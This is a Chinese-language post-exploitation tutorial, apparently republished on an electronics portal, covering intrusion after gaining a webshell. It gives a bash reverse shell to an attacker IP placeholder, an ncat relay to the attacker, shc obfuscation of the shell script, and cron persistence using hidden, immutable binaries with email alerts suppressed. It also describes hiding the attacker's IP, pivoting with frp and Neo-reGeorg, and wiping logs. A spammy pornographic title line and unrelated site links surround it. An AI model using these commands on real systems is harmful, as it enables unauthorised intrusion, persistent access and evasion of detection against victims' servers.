欧美性猛交xxxx免费看_牛牛在线视频国产免费_天堂草原电视剧在线观看免费_国产粉嫩高清在线观看_国产欧美日本亚洲精品一5区

0
  • 聊天消息
  • 系統(tǒng)消息
  • 評(píng)論與回復(fù)
登錄后你可以
  • 下載海量資料
  • 學(xué)習(xí)在線課程
  • 觀看技術(shù)視頻
  • 寫(xiě)文章/發(fā)帖/加入社區(qū)
會(huì)員中心
創(chuàng)作中心

完善資料讓更多小伙伴認(rèn)識(shí)你,還能領(lǐng)取20積分哦,立即完善>

3天內(nèi)不再提示

一文解析后滲透及內(nèi)網(wǎng)初體驗(yàn)

馬哥Linux運(yùn)維 ? 來(lái)源:先知社區(qū) ? 作者:kilomite ? 2022-08-20 14:46 ? 次閱讀

繞php的disable_functions 此處建議用AntSword的官方繞過(guò)插件全自動(dòng)繞

d30c369e-1fc4-11ed-ba43-dac502259ad0.png

繞過(guò)失敗的可以手動(dòng)試一下

另外,可以看一下web程序存的數(shù)據(jù)庫(kù)的用戶名和密碼,然后看一下數(shù)據(jù)庫(kù)能不能利用,比如寫(xiě)文件或者寫(xiě)日志,以及各種提權(quán),如果繞過(guò)disable_functions失敗,數(shù)據(jù)庫(kù)也不能利用的可以看一下目標(biāo)服務(wù)器上都有什么文件,比如其他站點(diǎn)或者其他可以利用的東西,如果限制了訪問(wèn)目錄那就只能留著以后再看了

d340c95e-1fc4-11ed-ba43-dac502259ad0.png


隱藏ip

隱藏攻擊ip還是很重要的,不然容易被溯源,可以上cdn或者用云函數(shù)等 但是此處也是有大坑的,能訪問(wèn)國(guó)外服務(wù)器的目標(biāo)機(jī)器就好辦了,直接上就行,但是不能訪問(wèn)國(guó)外服務(wù)器的目標(biāo)機(jī)器,首先用Cloudflare比較卡,其次用國(guó)內(nèi)的云服務(wù)商的則需要實(shí)名,而且費(fèi)用也不低,所以實(shí)在沒(méi)辦法就別隱藏ip了,此處我也沒(méi)有隱藏ip

加密bash反彈shell

正常的bash反彈shell: 目標(biāo)機(jī)器反彈shell:


bash -i >& /dev/tcp/攻擊機(jī)的ip/攻擊機(jī)接收shell的端口 0>&1

攻擊機(jī)接收反彈來(lái)的shell:

nc -lvvp 攻擊機(jī)接收shell的端口

//netcat版本低時(shí)l和p參數(shù)不兼容,可以nc -lvv port監(jiān)聽(tīng)端口

這個(gè)repository加密一下bash腳本,加密后會(huì)生成一個(gè)c源代碼文件和編譯之后的二進(jìn)制文件,把編譯之后的二進(jìn)制文件傳到目標(biāo)機(jī)器上執(zhí)行就行了,可以彌補(bǔ)一下目標(biāo)機(jī)器在國(guó)內(nèi)時(shí)不便于隱藏攻擊ip的缺陷

本地執(zhí)行:

./shc -Uvrf reverse.sh -o reverse

把生成的reveser傳到目標(biāo)機(jī)器上,執(zhí)行:

./reverse

webshell提供的shell環(huán)境限制很多,所以最好先反彈shell,盡量不要正向連接shell,開(kāi)個(gè)端口動(dòng)靜太大

首先是不能彈shell的情況,比如相關(guān)的bash,nc等命令都被限制了,那先嘗試提權(quán)

能彈shell但是接收不到的時(shí)候,可以看一下目標(biāo)是不是限制出網(wǎng)或者限制出站端口

如果限制出網(wǎng)那就先嘗試提權(quán),如果限制出站端口可以批量試一下常見(jiàn)的端口,在自己的vps上,通過(guò)nginx監(jiān)聽(tīng)多個(gè)端口來(lái)快速啟動(dòng)多個(gè)端口,然后再在目標(biāo)機(jī)器上上傳個(gè)sh腳本,批量curl自己vps的指定端口,最后看一下結(jié)果就可以了,nmap ---top-ports 100或1000可以掃描nmap整理的100或1000個(gè)最常用的端口,可以參考一下

測(cè)試出網(wǎng)端口的具體步驟:

1.在正常的nginx配置文件中找到listen port,在后面復(fù)制一行,把port改成自己想開(kāi)放的端口,重啟nginx

2.寫(xiě)一個(gè)sh腳本,內(nèi)容就是每行都curl想測(cè)試的端口:curl vps:port

3.傳到目標(biāo)機(jī)器上,運(yùn)行并且重定向到文件里:./shfile > result.txt

4.查看result.txt中的結(jié)果,就可以看到哪些端口能出網(wǎng),nmap ---top-ports 100和nmap ---top-ports 1000可以查看nmap整理的100和1000個(gè)最常用的端口,可以參考一下

成功收到shell的時(shí)候,依舊是個(gè)很難用的shell,可以再升級(jí)成完全的shell再用,升級(jí)之后和真實(shí)shell一樣,非常舒服

# 攻擊機(jī)本地執(zhí)行# 首先檢查當(dāng)前終端和STTY信息$ echo $TERM$ stty -a# 查看輸出的rows和columns,后面配置用



此處的這些操作是重復(fù)性的,和具體設(shè)備無(wú)關(guān),所以用xshell的可以寫(xiě)個(gè)xshell的腳本或者錄制個(gè)xshell的腳本,不過(guò)我這邊錄制的時(shí)候生成的腳本內(nèi)容總是為空,應(yīng)該是個(gè)bug,也沒(méi)時(shí)間研究寫(xiě)xshell的腳本了,所以直接用按鍵精靈寫(xiě)了個(gè)



畢竟按鍵精靈只是模仿輸入,不能獲取到結(jié)果,所以每一步都是只輸入,不回車,需要自己回車,而且每一次輸入之后會(huì)多監(jiān)聽(tīng)一次任意按鍵事件,以防想暫停

如果想把這個(gè)shell關(guān)了,或者這個(gè)shell接收到了內(nèi)網(wǎng)的其他shell,然后想把接收到的其他shell關(guān)了,需要輸入兩次exit退出,然后可能shell的格式是亂的,這時(shí)候reset一下就好了

在攻擊機(jī)上肯定不可能直接就接收shell,如果本地和攻擊機(jī)的shell連接斷了,那么攻擊機(jī)和目標(biāo)機(jī)器的shell也就斷了,或者想把攻擊機(jī)接收到的shell掛在后臺(tái),也不能直接接收shell,此處我推薦使用screen,類似于windows下的多窗口,接收shell的時(shí)候新開(kāi)一個(gè)screen掛在后臺(tái),不用的時(shí)候就在后臺(tái)掛著,用的時(shí)候切過(guò)去用就可以了

screen的簡(jiǎn)單使用教程:

1.screen -S 這個(gè)screen會(huì)話的名字創(chuàng)建一個(gè)screen

2.在screen的會(huì)話中時(shí),快捷鍵ctrl+a,ctrl+d把當(dāng)前screen放在后臺(tái)

3.screen -r screen會(huì)話的名字恢復(fù)一個(gè)screen

4.在screen的會(huì)話中exit可以退出screen

5.一些小技巧:

1.`screen -list`查看所有的screen會(huì)話

2.`screen -list`會(huì)顯示相應(yīng)對(duì)話的pid,通過(guò)`kill -9 pid`也可以關(guān)閉相應(yīng)的screen會(huì)話

3.`screen -d screen會(huì)話的名字`可以將一個(gè)正在活動(dòng)的screen放到后臺(tái)

4.如果在screen中嵌套了screen,那么快捷鍵ctrl+a,ctrl+a,ctrl+d可以把第二層screen放在第一層的后臺(tái),快捷鍵ctrl+a,ctrl+d是不論嵌套幾層screen都會(huì)把最外層的screen放在后臺(tái)的

低權(quán)限提權(quán)

首先是信息收集,看一下/proc/version和/etc/*-release,然后在google和Exploit Database上找一下,同時(shí)看看打沒(méi)打補(bǔ)丁,如果目標(biāo)機(jī)器不能編譯的話可以在自己的機(jī)器上編譯好了傳過(guò)去 此處也發(fā)現(xiàn)了幾個(gè)提權(quán)工具,不過(guò)我試了一下不是很好用,都是靠版本來(lái)判斷的,和手動(dòng)搞一樣

權(quán)限維持

切記要做持久化,不然辛辛苦苦拿的shell可能就要重新拿或者沒(méi)了,方法很多,可以google搜一下,與時(shí)俱進(jìn),用最新的東西,下面是一種我常用的權(quán)限維持的方式:

cron計(jì)劃任務(wù)權(quán)限維持比較簡(jiǎn)單,當(dāng)然也比較明顯:

建議用前面說(shuō)的shc加密,上傳生成的二進(jìn)制文件,用這個(gè)二進(jìn)制文件彈shell,安全性高一點(diǎn)

上傳之后:

1.先chmod +x 二進(jìn)制文件給一下權(quán)限

2.然后在名字前面加個(gè).變?yōu)殡[藏文件(ls -a可以查看隱藏文件)

3.再嘗試一下chattr +i 二進(jìn)制文件(chattr -i 二進(jìn)制文件可以解除鎖定)防止刪除,有相應(yīng)的權(quán)限才能成功執(zhí)行這條命令

4.最后把這個(gè)文件放在安全又隱秘的位置,

配置cron計(jì)劃任務(wù)時(shí),如果是root用戶,那就在/etc/crontab里添加,如果不是root用戶,那就用crontab -e添加,注意crontab -e需要交互式shell,理論上來(lái)說(shuō)非root用戶的cron存在/var/spool/crond下(CentOS),可以直接編輯相應(yīng)的文件,但是非root用戶通常沒(méi)有權(quán)限直接編輯,所以還是需要獲取交互式shell然后crontab -e添加

root用戶在/etc/crontab里添加的計(jì)劃任務(wù),通過(guò)crontab -l或crontab -e是看不到的

/etc/crontab里應(yīng)該有默認(rèn)的配置和默認(rèn)的例子,crontab -e沒(méi)有,不管是怎么寫(xiě)cron,都建議使用以下配置:

在寫(xiě)cron之前先執(zhí)行$PATH查看環(huán)境變量并復(fù)制,然后再寫(xiě)cron

首先第一行配置為SHELL=+相應(yīng)的shell位置,第二行配置為PATH=+默認(rèn)的(如果有的話)加上前面的$PATH,第三行配置為MAILTO="",第三行的意義是計(jì)劃任務(wù)的執(zhí)行結(jié)果不給用戶發(fā)郵件,因?yàn)橛?jì)劃任務(wù)反彈shell是不停的反彈,但是攻擊機(jī)如果之前接收到的shell還沒(méi)關(guān)端口被占用著彈shell就失敗了就會(huì)報(bào)錯(cuò)然后發(fā)郵件,發(fā)了郵件的話每次執(zhí)行命令都會(huì)提示,很容易就被發(fā)現(xiàn)了

最后配置計(jì)劃任務(wù):

root用戶配置為* * * * * root /要執(zhí)行的命令或文件

非root用戶配置為* * * * * /要執(zhí)行的命令或文件

如果要修改執(zhí)行的間隔可以研究一下cron的語(yǔ)法,上面的是每分鐘彈一次shell

內(nèi)網(wǎng)

信息收集

激動(dòng)人心的時(shí)刻來(lái)了,打內(nèi)網(wǎng) 因?yàn)槲夷玫降膕hell都是linux下的,沒(méi)有類似windows上的域控等等,所以此處就掃掃端口,此處可以用nmap,也可以用fscan,強(qiáng)烈推薦fscan,用一次就上癮,很好用

搭建代理

有些內(nèi)網(wǎng)ip的端口上跑的比如網(wǎng)站等等在命令行不太好滲透,而且有些內(nèi)網(wǎng)ip是不出網(wǎng)的,只能通過(guò)我們打下來(lái)的這個(gè)邊界服務(wù)器來(lái)訪問(wèn),所以建個(gè)代理還是很有必要的

此處我推薦用frp,然后依舊遵循動(dòng)靜小點(diǎn)的原則,不在目標(biāo)機(jī)器上開(kāi)端口,在自己的vps上架設(shè)frp的服務(wù)端,在目標(biāo)機(jī)器上架設(shè)frp的客戶端,然后在客戶端啟用socks5代理插件,這會(huì)在服務(wù)端上開(kāi)一個(gè)你指定的端口用來(lái)做socks5代理,可以配置用戶名和密碼,還可以遠(yuǎn)程連接,同時(shí)可以搭配其他軟件做ip的黑白名單,非常好用,本地配置代理Windows建議用Proxifier,Linux建議用proxychains-ng(proxychains4)

另外也可以用Neo-reGeorg,直接上傳個(gè)php/jsp等文件就可以建socks5代理,也很好用,對(duì)比f(wàn)rp一個(gè)優(yōu)點(diǎn)是只傳文件不用執(zhí)行命令就可以建代理,另一個(gè)優(yōu)點(diǎn)是不用在目標(biāo)機(jī)器上額外在后臺(tái)掛一個(gè)程序

內(nèi)網(wǎng)滲透

其實(shí)和前面的web滲透一樣,只不過(guò)有些應(yīng)用在內(nèi)網(wǎng)比較常見(jiàn),所以需要去了解一下,搜一下有什么漏洞

fscan本身會(huì)檢測(cè)漏洞,比如各種未授權(quán)訪問(wèn),也會(huì)爆破一些端口的服務(wù),比如mysql,ssh或者Tomcat的Manager App的弱口令等

一個(gè)C段可以見(jiàn)識(shí)不少東西,打了一遍下來(lái)竟然天亮了...一天一夜過(guò)去了

具體就不細(xì)說(shuō)了,遇見(jiàn)哪個(gè)搜哪個(gè),這個(gè)C段遇到的web程序基本都是java系的,還有一些python系的

內(nèi)網(wǎng)不出網(wǎng)反彈shell

目標(biāo)機(jī)器如果不出網(wǎng)可以反彈到已經(jīng)打下來(lái)的內(nèi)網(wǎng)機(jī)器上,也可以再把反彈的端口轉(zhuǎn)發(fā)到vps上,實(shí)現(xiàn)通過(guò)轉(zhuǎn)發(fā)出網(wǎng)

通過(guò)ncat轉(zhuǎn)發(fā)出網(wǎng):

中轉(zhuǎn)的機(jī)器執(zhí)行:


ncat -l 中轉(zhuǎn)機(jī)器接收內(nèi)網(wǎng)反彈來(lái)的shell的端口 -c 'ncat 攻擊機(jī)的ip 攻擊機(jī)的端口'

這樣攻擊機(jī)就可以接收到不出網(wǎng)的設(shè)備彈的shell,唯一的缺點(diǎn)就是中轉(zhuǎn)的機(jī)器要占用個(gè)端口 中不中轉(zhuǎn)對(duì)于不出網(wǎng)的設(shè)備的權(quán)限維持都是一樣的,主要的區(qū)別就是在vps上連不出網(wǎng)的設(shè)備方便點(diǎn)

痕跡清理

主要是命令的歷史記錄和日志文件,不過(guò)基本清不干凈,而且有些地方記錄了也清不到,隱藏攻擊ip比較萬(wàn)能

下面是一個(gè)簡(jiǎn)單粗暴的清理方式,如無(wú)必要不建議使用:





審核編輯:劉清

聲明:本文內(nèi)容及配圖由入駐作者撰寫(xiě)或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點(diǎn)僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場(chǎng)。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問(wèn)題,請(qǐng)聯(lián)系本站處理。 舉報(bào)投訴
  • Web
    Web
    +關(guān)注

    關(guān)注

    2

    文章

    1272

    瀏覽量

    69760
  • 服務(wù)器
    +關(guān)注

    關(guān)注

    12

    文章

    9335

    瀏覽量

    86144
  • 數(shù)據(jù)庫(kù)
    +關(guān)注

    關(guān)注

    7

    文章

    3852

    瀏覽量

    64746
  • Shell
    +關(guān)注

    關(guān)注

    1

    文章

    366

    瀏覽量

    23476

原文標(biāo)題:干貨|后滲透及內(nèi)網(wǎng)初體驗(yàn)的總結(jié)

文章出處:【微信號(hào):magedu-Linux,微信公眾號(hào):馬哥Linux運(yùn)維】歡迎添加關(guān)注!文章轉(zhuǎn)載請(qǐng)注明出處。

收藏 人收藏

    評(píng)論

    相關(guān)推薦

    Web安全之滲透測(cè)試基礎(chǔ)與實(shí)踐

    在網(wǎng)絡(luò)安全領(lǐng)域,Web滲透測(cè)試是發(fā)現(xiàn)Web應(yīng)用漏洞的重要手段。下面介紹滲透測(cè)試的基礎(chǔ)和實(shí)踐。 信息收集是滲透測(cè)試的第步。使用whois命令查詢域名注冊(cè)信息,nslookup命令查詢域
    的頭像 發(fā)表于 01-22 09:33 ?107次閱讀

    什么是滲透作用_金屬封裝又是如何發(fā)生滲透

    ? 滲透作用使得芯片封裝中沒(méi)有絕對(duì)的氣密性封裝,那么什么是滲透作用?金屬封裝又是如何發(fā)生滲透的呢??? 滲透:氣體從密度大的側(cè)向密度小的
    的頭像 發(fā)表于 11-22 10:27 ?461次閱讀

    如何設(shè)置內(nèi)網(wǎng)IP的端口映射到公網(wǎng)

    在現(xiàn)代網(wǎng)絡(luò)環(huán)境中,端口映射(Port Mapping)是項(xiàng)非常實(shí)用的技術(shù),它允許用戶將內(nèi)網(wǎng)設(shè)備的服務(wù)端口映射到公網(wǎng),使外網(wǎng)用戶可以訪問(wèn)內(nèi)網(wǎng)中的服務(wù)。這項(xiàng)技術(shù)在遠(yuǎn)程辦公、設(shè)備遠(yuǎn)程控制、游戲
    的頭像 發(fā)表于 11-14 14:23 ?832次閱讀

    內(nèi)網(wǎng)穿透詳解:從傳統(tǒng)方式到P2link的優(yōu)勢(shì)探討

    隨著互聯(lián)網(wǎng)的發(fā)展,越來(lái)越多的應(yīng)用場(chǎng)景需要通過(guò)遠(yuǎn)程訪問(wèn)內(nèi)網(wǎng)資源,無(wú)論是企業(yè)遠(yuǎn)程辦公、家庭私有云服務(wù)器的管理,還是物聯(lián)網(wǎng)設(shè)備的監(jiān)控,都需要解決個(gè)關(guān)鍵問(wèn)題——內(nèi)網(wǎng)穿透。傳統(tǒng)的內(nèi)網(wǎng)穿透方式有
    的頭像 發(fā)表于 11-13 14:19 ?361次閱讀

    ElfBoard技術(shù)貼|如何完成FRP內(nèi)網(wǎng)穿透

    FRP(FastReverseProxy)是款高效能的反向代理工具,專為解決內(nèi)網(wǎng)穿透問(wèn)題而設(shè)計(jì)。它能夠?qū)?b class='flag-5'>內(nèi)網(wǎng)中的服務(wù)安全地暴露至公網(wǎng),讓外部用戶輕松實(shí)現(xiàn)遠(yuǎn)程訪問(wèn)。FRP支持TCP、UDP、HTTP
    的頭像 發(fā)表于 11-08 13:30 ?403次閱讀
    ElfBoard技術(shù)貼|如何完成FRP<b class='flag-5'>內(nèi)網(wǎng)</b>穿透

    內(nèi)網(wǎng)通過(guò)公網(wǎng)地址訪問(wèn)內(nèi)網(wǎng)服務(wù)器的設(shè)置方法

    些場(chǎng)景下,內(nèi)部網(wǎng)絡(luò)中的服務(wù)器需要通過(guò)公網(wǎng)地址進(jìn)行訪問(wèn),尤其是在沒(méi)有固定公網(wǎng)IP或需要在外部訪問(wèn)時(shí)。為了解決這問(wèn)題,可以使用以下幾種方法實(shí)現(xiàn)內(nèi)網(wǎng)穿透,方便地通過(guò)公網(wǎng)訪問(wèn)內(nèi)網(wǎng)服務(wù)器。
    的頭像 發(fā)表于 11-07 15:09 ?843次閱讀

    常見(jiàn)的內(nèi)網(wǎng)穿透工具對(duì)比

    國(guó)內(nèi)的內(nèi)網(wǎng)穿透工具有不少選擇,適合不同的使用場(chǎng)景和需求。以下是些比較常見(jiàn)的國(guó)內(nèi)內(nèi)網(wǎng)穿透工具:
    的頭像 發(fā)表于 11-06 14:59 ?1412次閱讀

    打破網(wǎng)絡(luò)邊界:P2Link助力實(shí)現(xiàn)高效遠(yuǎn)程訪問(wèn)與內(nèi)網(wǎng)穿透

    (網(wǎng)絡(luò)地址轉(zhuǎn)換)之后,使得外網(wǎng)設(shè)備難以直接對(duì)這些內(nèi)網(wǎng)設(shè)備進(jìn)行訪問(wèn)。此時(shí),內(nèi)網(wǎng)穿透技術(shù)應(yīng)勢(shì)而生,而 P2Link 作為種極為高效的內(nèi)網(wǎng)穿透解決方案,成功打破了網(wǎng)絡(luò)邊界,為人們帶來(lái)了便捷
    發(fā)表于 10-31 11:54

    如何通過(guò)內(nèi)網(wǎng)IP安全訪問(wèn)云服務(wù)器?

    要通過(guò)內(nèi)網(wǎng)IP安全訪問(wèn)云服務(wù)器,您需要考慮以下幾個(gè)步驟: 1、獲取內(nèi)網(wǎng)IP地址:首先,您需要確定云服務(wù)器的內(nèi)網(wǎng)IP地址。這通??梢栽谠品?wù)提供商的管理控制臺(tái)中找到。 2、配置安全組規(guī)則:為了允許特定
    的頭像 發(fā)表于 09-23 13:36 ?625次閱讀

    遠(yuǎn)程桌面內(nèi)網(wǎng)穿透是什么?有什么作用?

    遠(yuǎn)程桌面內(nèi)網(wǎng)穿透指的是通過(guò)特定技術(shù)手段,將處于內(nèi)網(wǎng)中的電腦或服務(wù)器,通過(guò)外部網(wǎng)絡(luò)(互聯(lián)網(wǎng))進(jìn)行訪問(wèn)。內(nèi)網(wǎng)穿透的主要作用是解決在內(nèi)網(wǎng)環(huán)境下,遠(yuǎn)程設(shè)備與外部互聯(lián)網(wǎng)之間的連接問(wèn)題,允許用戶從
    的頭像 發(fā)表于 09-13 08:10 ?498次閱讀
    遠(yuǎn)程桌面<b class='flag-5'>內(nèi)網(wǎng)</b>穿透是什么?有什么作用?

    這個(gè)組網(wǎng)、內(nèi)網(wǎng)穿透工具遠(yuǎn)程連接是真的牛!

    首先,我們來(lái)探討個(gè) 常見(jiàn)的疑問(wèn) :為什么遠(yuǎn)程無(wú)法直接訪問(wèn)你電腦或NAS上運(yùn)行的網(wǎng)站和服務(wù)? 原因在于 ,多數(shù)情況下,這些設(shè)備都被安置在內(nèi)網(wǎng)之中,缺乏個(gè)可供外界直接訪問(wèn)的獨(dú)立公網(wǎng)IP地址,為了打破
    的頭像 發(fā)表于 08-19 16:08 ?442次閱讀
    這個(gè)組網(wǎng)、<b class='flag-5'>內(nèi)網(wǎng)</b>穿透工具遠(yuǎn)程連接是真的牛!

    teamviewer內(nèi)網(wǎng)遠(yuǎn)程控制外網(wǎng)

    在企業(yè)內(nèi)網(wǎng)環(huán)境中,安全性、穩(wěn)定性和性能是企業(yè)用戶關(guān)注的重點(diǎn)。然而,許多遠(yuǎn)程控制軟件在內(nèi)網(wǎng)應(yīng)用中存在限制,無(wú)法滿足企業(yè)的特殊需求。比如知名的遠(yuǎn)程控制軟件 TeamViewer,其功能強(qiáng)大,但并未提供
    的頭像 發(fā)表于 08-16 20:46 ?1490次閱讀

    企業(yè)使用內(nèi)網(wǎng)安全管理軟件的好處

    隨著信息化時(shí)代的到來(lái),企業(yè)數(shù)據(jù)安全問(wèn)題也開(kāi)始受到重視。其中,防止數(shù)據(jù)泄露直是企業(yè)安全管理中重要的環(huán)。企業(yè)使用內(nèi)網(wǎng)安全管理軟件可以幫助實(shí)現(xiàn)以下幾點(diǎn): 確保內(nèi)部網(wǎng)絡(luò)安全:內(nèi)網(wǎng)安全管理軟
    的頭像 發(fā)表于 05-22 13:27 ?378次閱讀

    讀懂 | 新能源汽車車載電源深度解析

    車載電源是新能源汽車的核心零部件之。本文從車載電源的作用、構(gòu)成、技術(shù)趨勢(shì)、市場(chǎng)空間及產(chǎn)業(yè)鏈,對(duì)其進(jìn)行全方位解析。我們看好快充車滲透率提升帶來(lái)的車載電源升級(jí)需求。核心觀點(diǎn)車載電源:電動(dòng)車能量轉(zhuǎn)換
    的頭像 發(fā)表于 05-16 17:15 ?2646次閱讀
    <b class='flag-5'>一</b><b class='flag-5'>文</b>讀懂 | 新能源汽車車載電源深度<b class='flag-5'>解析</b>

    STM32H5 DA 之初體驗(yàn)(帶 TrustZone)

    電子發(fā)燒友網(wǎng)站提供《STM32H5 DA 之初體驗(yàn)(帶 TrustZone).pdf》資料免費(fèi)下載
    發(fā)表于 02-19 14:19 ?0次下載
    STM32H5 DA 之<b class='flag-5'>初體驗(yàn)</b>(帶 TrustZone)